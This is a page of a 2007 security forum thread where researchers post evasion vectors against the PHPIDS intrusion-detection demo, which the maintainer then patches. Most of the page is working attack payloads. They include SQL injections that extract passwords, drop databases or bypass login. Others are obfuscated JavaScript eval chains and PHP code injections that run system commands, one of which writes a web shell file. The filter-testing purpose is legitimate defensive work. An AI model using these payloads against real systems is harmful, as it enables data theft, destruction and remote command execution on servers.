Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...56789101112131415...LastNext
Current Page: 10 of 31
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 27, 2007 04:57PM

aa'LIKE'0 (php-ids)
aa'REGEXP/RLIKE BINARY 0#( (php-ids)
aa'SOUNDS LIKE+'1 (php-ids)
aa'or CURRENT_TIME!='0 (php-ids)
aa'or CURRENT_TIMESTAMP!='0 (php-ids)
aa'!=LOCALTIMESTAMP #( (php-ids)
aa'in (0)#( (php-ids)
aa'!=ascii(1)#( (php-ids)
... and other functions

(some may not be logical, but they all work - at least at my MySQL 4 DB)



Edited 5 time(s). Last edit at 09/27/2007 05:13PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 28, 2007 06:25PM

successfully tested on MSSQL:
http://demo.php-ids.org/?test=1'%20union%20(select%20password%20from%20users)%20--%20-a
--> ?test=1' union (select password from users) -- -a
--> ?test=1' union (select'1','2',password from users) -- -a (for 3 columns)
--> ?test=1' union all (select'1',password from users) -- -a

--> ?test=' or SOUNDEX (1) != '0

http://demo.php-ids.org/?test=';if%201=1%20drop%20database%20test--%20-a
--> ?test=';if 1=1 drop database test-- -a
--> ?test=';if 1=1 drop table users-- -a
--> ?test=';if 1=1 shutdown-- -a
(combined with all possible operation and prefixes)

or
--> ?test='; while 1=1 shutdown-- -a
--> ?test='; begin shutdown end-- -a
(combined with other functions like create, drop and so on)

have a nice weekend,
Reiners



Edited 3 time(s). Last edit at 09/28/2007 08:13PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 28, 2007 08:10PM

@Reiners: nice!

This one took some doing: [demo.php-ids.org]
?test='+COALESCE('admin') and 1 not between !1 div 0+' EDIT: <--- this returns an empty set.

Corrected: http://demo.php-ids.org/?test=%27%2bCOALESCE%28%27admin%27%29%20and%201%20not%20between%20%211%20div%201%2b%27
?test='+COALESCE('admin') and 1 not between !1 div 1+'

Auth Bypass for queries like
SELECT * FROM `users` WHERE username=''+COALESCE('admin') and 1 NOT BETWEEN !1 div 1+'' AND password='' LIMIT 1;

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 09/28/2007 10:19PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 28, 2007 08:44PM

Hi tx!
thanks ;) which DBMS are you using? couldn't run "coalesce('admin')" successfully on my MSsql 2005, but I just installed it some hours ago and am still a bit confused about all the different possibilities and expressions compared to MySQL. there is alot to discover I guess ... :)

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 28, 2007 09:18PM

@Reiners: MySQL 5.0.41. But it wouldn't run cause I made a typo, too eager to get home I guess :/

This is the correct vector
'+COALESCE('admin') and 1 not between !1 div 1+'
I'll edit my post, thx for noticing!

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 28, 2007 10:47PM

I just thought of these variants on the way to the store (inspired by Reiners recent vectors): http://demo.php-ids.org/?test=%27%20COALESCE%28%27admin%27%29%20and%20@@version%20NOT%20BETWEEN%20%211%20div%201%20%27
?test='+COALESCE('admin') and @@version NOT BETWEEN !1 div 1+'
tons of options here:
?test='+COALESCE('admin') and @@version NOT BETWEEN !@@version div @@version+'
For fun:
?test='+COALESCE('admin') and 1 =+1 NOT BETWEEN !true div @@version+'

@Reiners: I just installed mssql :)
I have a feeling there is alot of unexplored territory in Transact SQL.

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/28/2007 10:49PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: September 29, 2007 11:16AM

Hi!

After a pretty long session of fixing and testing I think I got them all. Those were some hard nuts to crack this time... Some of them - especially the very short ones are detected with the concatenation rule - which I find ok since I would consider them to be used as very first probing. What do you think?

Greetings and nice weekend,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: thornmaker
Date: September 29, 2007 12:38PM

Here's an arbitrary code execution one that works in firefox: http://demo.php-ids.org/?test=%24%61%3D%20%21%66%61%6C%73%65%3F%27%65%76%27%3A%31%0A%24%62%3D%20%21%66%61%6C%73%65%3F%20%27%61%6C%27%3A%31%0A%24%61%3D%20%21%66%61%6C%73%65%3F%24%61%2B%24%62%3A%31%0A%24%61%3D%20%21%66%61%6C%73%65%3F%30%5B%24%61%5D%3A%31%0A%24%62%3D%20%21%66%61%6C%73%65%3F%27%6C%6F%63%61%74%27%3A%31%0A%24%63%3D%20%21%66%61%6C%73%65%3F%27%69%6F%6E%2E%68%27%3A%31%0A%24%64%3D%20%21%66%61%6C%73%65%3F%27%61%73%68%27%3A%31%0A%24%62%3D%20%21%66%61%6C%73%65%3F%24%62%2B%24%63%2B%24%64%3A%31%0A%24%61%20%73%65%74%74%65%72%3D%24%61%2C%24%61%3D%24%61%3D%24%62#0=%7b%7d,alert%28%27thanks%20Gareth%20and%20Greg%27%29

This is a combined effort of Gareth and me, however inspiration for it came from this post from Greg: http://sla.ckers.org/forum/read.php?2,15812#msg-16293 .

Anyhow, here's the actual injection:

$a= !false?'ev':1
$b= !false? 'al':1
$a= !false?$a+$b:1
$a= !false?0[$a]:1
$b= !false?'locat':1
$c= !false?'ion.h':1
$d= !false?'ash':1
$b= !false?$b+$c+$d:1
$a setter=$a,$a=$a=$b

This one was too much work to not include a bit of an explanation... Working from the outside in. First eliminate the ternary operators which are a cool way Gareth found to concat strings together. Also, drop the $ from the variables which was needed to avoid a filter. This leaves something like:

a='eval';
a=0[a];
b='location.hash';
a setter=a;
a=a=b

The first two lines are just a way of setting a variable to the eval function. This has to be obfuscated because including the function eval directly triggers several filters.

The third line is the line of code that we need to eval. Note that .substr(1) is not needed because the hash sign can be interpreted as valid javascript if turned into a sharp variable. You just have to make the code after that hash be like: #0={};<<payload here>>

The final two lines use Greg's very cool trick to actually eval the location.hash without using any open or close parenthesis, which is necessary to avoid various filters (in particular, the new centrifuge one). Note that, as usual, we have to do the eval twice, the first time evaluates to the string in the hash, the second time executes the javascript in the hash where the true payload is contained. I find it amazing that a=a=b actually works.

So there ya go... arbitrary code execution. It's nice having a challenge like this to give us an excuse to dig into the gory innards of JavaScript. :)

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 29, 2007 01:04PM

@ thornmaker (and everyone involved): very nice!!

@.mario:
Nice fixes! but there are again a few tricks ;) However the rules detect all commonly used SQLi an attacker would try first I think.

some evasions with prefixes:
'=+' (php-ids)
-1'=-'+1 (php-ids)
aa' like+'0 (php-ids)
aa' REGEXP+'0 (php-ids)
aa' SOUNDS like+'1 (php-ids)
aa' or column=+!1 #1 (php-ids)

functions and statics cant be used anymore because the comment types get filtered. However you can combine functions with "and/or":
aa'in('aa') or-1!='0 (php-ids)
a'IS NOT NULL or+1=+'1 (php-ids)
aa'!=ascii(1) or-1=-'1 (php-ids)

But anyways, I think its important to filter comment types and it does work very well atm (if it doesnt raise too much false positives ;)

as always I dont consider the next two to be dangerous, because an attacker needs to guess the column name first:
asd' or column= !1 and+1='1 (php-ids)
asd' or column&&'1 (php-ids)

Is there any wordlist you filter? because "aa'or LOCALTIME" gets detected, "aa'or LOCALTIM" not. But I cant see the word in the displayed rule. Same for the word "BINARY" for example. Could you post this wordlist please? (if exists)



Edited 2 time(s). Last edit at 09/29/2007 01:16PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: September 29, 2007 01:41PM

> So there ya go... arbitrary code execution. It's
> nice having a challenge like this to give us an
> excuse to dig into the gory innards of JavaScript.
> :)

Cool work man! Well done :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: September 30, 2007 04:02PM

I was bored on Sunday after footy, so I created 2 new vectors :-

Vector 1:-
$1 = /e1v1a1l/+''
$2 = []
$2 += $1[1]
$2 += $1[3]
$2 += $1[5]
$2 += $1[7]
$2 = $1[ $2 ]
$3 = /a1l1e1r1t1(1)1/+''
$4 = []
$4 += $3[1]
$4 += $3[3]
$4 += $3[5]
$4 += $3[7]
$4 += $3[9]
$4 += $3[11]
$4 += $3[12]
$4 += $3[13]
$2_ = $2
$4_ = $4
$2_ ( $4_ )

Vector 2:-
This next one is beautiful one liner which I've gotta supply some
information on the quirks of javascript.

Javascript allows you to call String functions on new strings like
''.StringFunction() as you probably know but interestingly it also
allows calling functions without dots and and as strings using []
brackets. So I used a regular expression with the .source property to
get the original string "replace" then I used a new regular expression
"/z/g" to replace the "z" from to string to create
"javascript:alert(1)" finally to create the replace I found a blank
string can be created using [] which completes the replace.

URL = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ] ](/z/g, [] )
: 0

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: thornmaker
Date: September 30, 2007 08:16PM

@Reiners: I'm not an sql wiz, but you seem to be on quite a roll with all of these sql ones!

@gareth: nice, and creative!

@mario: this is a slight variant on the one posted yesterday: http://demo.php-ids.org/?test=%78%3D%21%5B%5D%3F%27%34%32%27%3A%30%0A%24%61%3D%20%21%78%3F%27%65%76%27%3A%30%0A%24%62%3D%20%21%78%3F%27%61%6C%27%3A%30%0A%24%61%3D%20%21%78%3F%24%61%2B%24%62%3A%30%0A%24%61%20%73%65%74%74%65%72%20%3D%20%21%78%3F%30%5B%24%61%5D%3A%30%0A%24%62%3D%20%21%78%3F%27%6C%6F%63%61%74%27%3A%30%0A%24%63%3D%20%21%78%3F%27%69%6F%6E%2E%68%27%3A%30%0A%24%64%3D%20%21%78%3F%27%61%73%68%27%3A%30%0A%24%62%3D%20%21%78%3F%24%62%2B%24%63%2B%24%64%3A%30%0A%24%6D%73%67%3D%20%21%78%3F%27%69%20%6C%6F%76%65%20%74%65%72%6E%61%72%79%20%6F%70%65%72%61%74%6F%72%73%27%3A%30%0A%24%61%3D%24%61%3D%24%62#%30%3D%7B%7D%3B%61%6C%65%72%74%28%24%6D%73%67%29

It looks like:
x=![]?'42':0
$a= !x?'ev':0
$b= !x?'al':0
$a= !x?$a+$b:0
$a setter= !x?0[$a]:0
$b= !x?'locat':0
$c= !x?'ion.h':0
$d= !x?'ash':0
$b= !x?$b+$c+$d:0
$a=$a=$b

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: kishord
Date: September 30, 2007 10:01PM


Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 01, 2007 02:48AM

@Reiners: Yep - before the string is matched by the rules a lot of things happen to it - check the converter class to see what exactly. Without the help on the converter class the rules would become really bloaty and many attacks couldn't be detected as such at all.

And yes - there's a big problem with comments - especially the # ones. So I think the comment rule won't be enhanced much more because it would generate tons of false alerts anyway. I will take care of the new SQL injections tomorrow - thanks again!

@thornmaker & Gareth: Awesome stuff as usual ;) Luckily the converter could take care of those concatenations pretty easily *fixed*

@All: We are thinking about building up a Wiki with extraordinary injections explained (JS, SQLI etc.)- we are discussing that issue in the group - what do you guys think?
http://groups.google.de/group/php-ids/browse_thread/thread/4e6d83e9ebd353c5

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 01, 2007 06:31AM

@.mario: I personally like the idea of the wiki to sum up the creative work coming up during the tests. especially the crazy JS ones ;)

new stuff for tomorrow:
--> ?test=1';declare @# int;shutdown;set @# = '1 (php-ids)
--> ?test=1';declare @@ int;shutdown;set @@ = '1 (php-ids)

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 01, 2007 03:00PM

I figure I've got to lay off the SQL for a bit, especially if we're gonna have a contest, so:

Remote code injection (php5): http://demo.php-ids.org/?test=%22%3B%20%24_a%3D%28%21%20%27a%27%29%20.%20%22php%22%3B%20%24_a.%3D%28%21%20%27a%27%29%20.%20%22info%22%3B%0A%24_a%281%29%3B%20%24b%3D%22
?test="; $_a=(! 'a') . "php"; $_a.=(! 'a') . "info";
$_a(1); $b="

EDIT: More dangerous variation: http://demo.php-ids.org/?test=%22%3B%0A%24_a%3D%28%21%20%27a%27%29%20.%20%22sys%22%3B%20%0A%20%20%24_a.%3D%28%21%20%27a%27%29%20.%20%22tem%22%3B%20%0A%24_b%3D%28%21%20%27a%27%29%20.%20%22bas%22%3B%20%0A%20%20%24_b.%3D%28%21%20%27a%27%29%20.%20%22e64%22%3B%20%0A%20%20%24_b.%3D%28%21%20%27a%27%29%20.%20%22_de%22%3B%20%0A%20%20%24_b.%3D%28%21%20%27a%27%29%20.%20%22cod%22%3B%20%0A%20%20%24_b.%3D%20%28%21%20%27a%27%29%20.%20%22e%22%3B%20%20%0A%24_c%3D%20%28%21%20%27a%27%29%20.%20%27a%27%3B%0A%24_d%3D%28%21%20%27a%27%20%29%20.%20%24_REQUEST%5B%20%24_c%20%5D%3B%20%0A%24_a%20%28%20%24_b%20%28%20%24_d%29%20%29%3B%20%0A//&a=ZWNobyBmb3JtYXQgYzpc
?test=";
$_a=(! 'a') . "sys"; 
  $_a.=(! 'a') . "tem"; 
$_b=(! 'a') . "bas"; 
  $_b.=(! 'a') . "e64"; 
  $_b.=(! 'a') . "_de"; 
  $_b.=(! 'a') . "cod"; 
  $_b.= (! 'a') . "e";  
$_c= (! 'a') . 'a';
$_d=(! 'a' ) . $_REQUEST[ $_c ]; 
$_a ( $_b ( $_d) ); 
//

Base 64 payload is not caught either http://demo.php-ids.org/?test=ZWNobyBmb3JtYXQgYzpc (not that I think it should be, 'echo format c:\' isn't really a threat, I just included this link to show that this vector would actually result in remote command execution without detection)


@.mario: I think the wiki is an excellent idea!

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 10/01/2007 04:30PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: thornmaker
Date: October 01, 2007 05:48PM

good stuff tx!

Oh, and I like how you indented your code... much more readable that way :)

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 01, 2007 07:27PM

@.mario: Excellent and timely fixes, once again. :)
@thornmaker: thx!

Function call (phpinfo) can be bypassed as follows: http://demo.php-ids.org/?test=%22%3B%20define%28_a%2C%27phpinfo%27%29%3B%20if%20%20%281%29%20%24_a%3D_a%3B%20%24_a%281%29%3B//
?test="; define(_a,'phpinfo'); if  (1) $_a=_a; $_a(1);//

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 10/01/2007 07:49PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: thornmaker
Date: October 01, 2007 08:48PM

another minor variation: http://demo.php-ids.org/?test=%24%61%3D%31%2E%3F%27%61%6C%27%3A%30%0A%24%61%3D%20%21%30%2E%3F%27%65%76%27%2B%24%61%3A%30%0A%24%61%20%73%65%74%74%65%72%3D%2F%78%2F%3F%30%5B%24%61%5D%3A%30%0A%24%62%3D%31%65%30%3F%27%61%73%68%27%3A%30%0A%24%62%3D%2E%31%65%31%3F%27%69%6F%6E%2E%68%27%2B%24%62%3A%30%0A%24%62%3D%31%2E%65%31%3F%27%6C%6F%63%61%74%27%2B%24%62%3A%30%0A%24%61%3D%24%61%3D%24%62#%30%3D%7B%7D%3B%61%6C%65%72%74%28%27%77%69%6B%69%20%77%69%6B%69%27%29

$a=1.?'al':0
$a= !0.?'ev'+$a:0
$a setter=/x/?0[$a]:0
$b=1e0?'ash':0
$b=.1e1?'ion.h'+$b:0
$b=1.e1?'locat'+$b:0
$a=$a=$b

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 01, 2007 09:38PM

Hi .mario!
Here are some more or less new filter evasions. I hope you still appreciate them and dont curse me for stressing you with work ;)

// some maths
aa'IS NOT NULL or+1^+'0
aa'IS NOT NULL or +1-1 xor'0
aa'IS NOT NULL or+2-1-1-1 !='0
aa'|1+1=(2)Or(1)='1
aa'|3!='4
aa'|ascii(1)+1!='1
aa'|LOCALTIME*0!='1

// spaces trick the filter
aa' = +'aa
aa' != ~'1
aa'SOUNDS like +'1
aa' or stringcolumn= +!1 #1
aa' or anycolumn ^ -'1
aa' or intcolumn && '1
aa'in('aa') or -1 != '0
aa'!=ascii(1) or -1 = -'1

// other
aa'like-'aa

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: thornmaker
Date: October 01, 2007 11:05PM

and another: http://demo.php-ids.org/?test=%24%61%3D%2F%69%2E%6C%6F%76%65%2E%63%68%61%6E%74%73%2F%0A%24%61%3D%31%2E%3F%27%27%2B%24%61%3A%30%0A%24%62%3D%24%61%5B%36%5D%0A%24%62%2B%3D%24%61%5B%35%5D%0A%24%62%2B%3D%24%61%5B%31%30%5D%0A%24%62%2B%3D%24%61%5B%33%5D%0A%24%62%20%73%65%74%74%65%72%3D%31%2E%3F%30%5B%24%62%5D%3A%30%0A%24%63%3D%24%61%5B%33%5D%0A%24%63%2B%3D%24%61%5B%34%5D%0A%24%63%2B%3D%24%61%5B%38%5D%0A%24%63%2B%3D%24%61%5B%31%30%5D%0A%24%63%2B%3D%24%61%5B%31%32%5D%0A%24%63%2B%3D%24%61%5B%31%5D%0A%24%63%2B%3D%24%61%5B%34%5D%0A%24%63%2B%3D%24%61%5B%31%31%5D%0A%24%63%2B%3D%24%61%5B%32%5D%0A%24%63%2B%3D%24%61%5B%39%5D%0A%24%63%2B%3D%24%61%5B%31%30%5D%0A%24%63%2B%3D%24%61%5B%31%33%5D%0A%24%63%2B%3D%24%61%5B%39%5D%0A%24%62%3D%24%62%3D%24%63#0=%7B%7D%3B%61%6C%65%72%74%28%27%6B%75%7A%61%3A%20%67%6F%20%73%74%75%64%79%27%29

[edit] i nearly forgot... here's the injection:

$a=/i.love.chants/
$a=1.?''+$a:0
$b=$a[6]
$b+=$a[5]
$b+=$a[10]
$b+=$a[3]
$b setter=1.?0[$b]:0
$c=$a[3]
$c+=$a[4]
$c+=$a[8]
$c+=$a[10]
$c+=$a[12]
$c+=$a[1]
$c+=$a[4]
$c+=$a[11]
$c+=$a[2]
$c+=$a[9]
$c+=$a[10]
$c+=$a[13]
$c+=$a[9]
$b=$b=$c



Edited 1 time(s). Last edit at 10/01/2007 11:48PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 02, 2007 02:40AM

@tx: Nice PHP concat madness - damn I am relived that PHP insists on a $ and \w+ for a variable label ;)

@Reiners: I will fix them ASAP! No curses - just a thx for helping increase the filter rules (I would have cursed if you had invented SQL *g*)

@thornmaker: Very cool! It took me a time to find outt more on the setter part. Some info here: http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Guide:Working_with_Objects#Defining_Getters_and_Setters

Quote

During development of JavaScript 1.5, there was a brief period in which expressions including getter = or setter = were used to define new getters or setters on existing objects. This syntax is highly deprecated now, will cause a warning in current JS 1.5 engines, and will become a syntax error in the future. It should be avoided.

@all: I will take care of building up the wiki tomorrow - I haven't still decidet what software to use yet - son any input is still welcome.

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: October 02, 2007 03:40AM

@Mario

It would be nice to be able to view failed attacks as well as successful ones. The failed attacks may provide inspiration for creating new ones. I've found loads of concat vectors which I could share, maybe we need some sort of forum or irc channel to discuss. We could always use the slackers one. I dunno what does everyone think?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 02, 2007 05:39AM

Would be a good idea to test all previous "fixed" exploits, since that is what most forgot, fixed one opened up another ^^ pentest strategy!~

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 02, 2007 06:44AM

@Ronald: I add any new exploit to the unit tests - so nothing will be lost. Also we have a tool to do regression tests with the xssDB data. And experience showed that if an exploit that was once fixed works again the guys from the group realize that faster than light ;)

@Gareth:
Quote

It would be nice to be able to view failed attacks as well as successful ones.
You mean in the wiki?



Edited 2 time(s). Last edit at 10/02/2007 06:47AM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: October 02, 2007 07:50AM

Maybe not the wiki but some sort of submission form, collecting all interesting vectors, you see some stuff isn't successful but nobody gets to see it even though it could be used in different ways. Ideally I would like a form to fill in with vector submissions that are successful or not and that information is viewable by everyone. I know you have the XSSDB but sharing specific information through the group would be useful.

Here's a example of a unsuccessful but cool vector:-
crypto [ [ 'aler' , 't' ] [ 'join' ] ( [] ) ] (1)

//Crypto is available in the window document on Firefox
//The object contains a reference to an alert function
//['aler','t'] creates an array and uses [] to perform the require array function
// [] joins the array to a string with nothing

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 02, 2007 11:44AM

Hmmm - I think we can collect the unsuccessful vectors as well - as long as unsuccessful means that the vector gets detected by the PHPIDS. I think the main objective of the should be to persist weird injections and uncover scripting techniques that are unknown to most developers/researchers.

Btw - I asked our admin to create a redirect to https://trac.php-ids.org/wiki/VectorWiki with vectors.php-ids.org - what do you think? (The wiki page itself is still very very basic - I will take care of that tomorrow)

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 02, 2007 01:23PM

Another remote command/code execution in php:
http://demo.php-ids.org/?test=%22%20%3B%20%20%0Adefine%20%28%20_a%20%2C%20%27ls%20-la%27%29%3B%0Aif%20%20%28%210%29%20%20%20%20%24_a%3D%22%22._a%3B%0Aif%20%28%210%29%20print%28%60%24_a%60%29%3B%0A//
?test=" ;  
define ( _a , 'ls -la');
if  (!0)    $_a=""._a;
if (!0) print(`$_a`);
//

With base64 payload [cHdk = base64_encode('pwd')]
http://demo.php-ids.org/?test=%22%20%3B%20%20define%20%28%20_c%20%2C%20%27cHdk%27%29%3B%0Aif%20%20%28%210%29%20%20%20%20%24_a%20%3D%20base64_decode%20%3B%0Aif%20%20%28%210%29%20%20%20%20%24_b%3D%22%22%20.%20%24_a%28_c%29%3B%0Aif%20%28%210%29%20print%28%60%24_b%60%29%3B//
?test=" ;  define ( _c , 'cHdk');
if  (!0)    $_a = base64_decode ;
if  (!0)    $_b="" . $_a(_c);
if  (!0) print(`$_b`);//

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 10/02/2007 03:51PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: October 02, 2007 03:35PM

.mario Wrote:
-------------------------------------------------------
> Hmmm - I think we can collect the unsuccessful
> vectors as well - as long as unsuccessful means
> that the vector gets detected by the PHPIDS.

Cool I think that would be very useful and can I also suggest that each entry has a payload point for for example instead of submit alert(1) you would submit alert({payload}) etc, I know this is going beyond your original intention but I feel some of the stuff going on is priceless and should be collected and then incorporated into the XSSDB.

> Btw - I asked our admin to create a redirect to
> https://trac.php-ids.org/wiki/VectorWiki with
> vectors.php-ids.org - what do you think? (The wiki
> page itself is still very very basic - I will take
> care of that tomorrow)

Excellent I think that will be good for everyone to collaborate and produce documentation on these cool vectors.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 02, 2007 03:52PM

Variation, XOR'd payload :) http://demo.php-ids.org/?test=%22%3B%20%0Adefine%20%28%20_a%2C%20%220008avwga000934mm40re8n5n3aahgqvaga0a303%22%29%20%3B%0Aif%20%20%28%20%210%29%20%24c%20%3D%20USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC%20%5E%20_a%3B%0Aif%20%20%28%20%210%29%20system%28%24c%29%20%3B//
?test="; 
define ( _a, "0008avwga000934mm40re8n5n3aahgqvaga0a303") ;
if  ( !0) $c = USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC ^ _a;
if  ( !0) system($c) ;//

Payload is
echo "<? system($_GET["a"]); ?>" > t.php

-tx @ lowtech-labs.org

Options: ReplyQuote
Pages: PreviousFirst...56789101112131415...LastNext
Current Page: 10 of 31


Sorry, only registered users may post in this forum.